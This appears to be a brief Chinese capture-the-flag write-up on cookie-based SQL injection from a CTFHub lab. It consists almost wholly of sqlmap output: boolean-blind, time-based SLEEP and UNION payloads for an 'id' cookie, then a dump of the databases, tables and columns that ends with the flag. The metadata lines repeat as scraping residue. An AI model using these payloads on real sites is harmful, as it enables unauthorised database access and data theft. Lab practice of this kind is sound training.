Cookie注入

Cookie注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
---
Parameter: id (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2366=2366

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 4938 FROM (SELECT(SLEEP(5)))dEgG)

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-5888 UNION ALL SELECT CONCAT(0x7162786b71,0x7878714d716972454578746451454d494c636f62545556576b504b4f7976505651705a416f514a63,0x7170767871),NULL-- -
tags: [web渗透]
title: Cookie注入
title: Cookie注入
title: Cookie注入
tags: [web渗透]
title: Cookie注入
tags: [web渗透]
---
1
2
3
4
5
available databases [4]:                                                                                                                  
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli
1
2
3
4
5
6
Database: sqli                                                                                                                            
[2 tables]
+------------+
| ahjsfimrve |
| news |
+------------+
1
2
3
4
5
6
7
8
Database: sqli
Table: ahjsfimrve
[1 column]
+------------+--------------+
| Column | Type |
+------------+--------------+
| sqiiksbqgz | varchar(100) |
+------------+--------------+
1
2
3
4
5
6
7
8
Database: sqli
Table: ahjsfimrve
[1 entry]
+----------------------------------+
| sqiiksbqgz |
+----------------------------------+
| ctfhub{16b9a1f9bff37d4f80eb8bc2} |
+----------------------------------+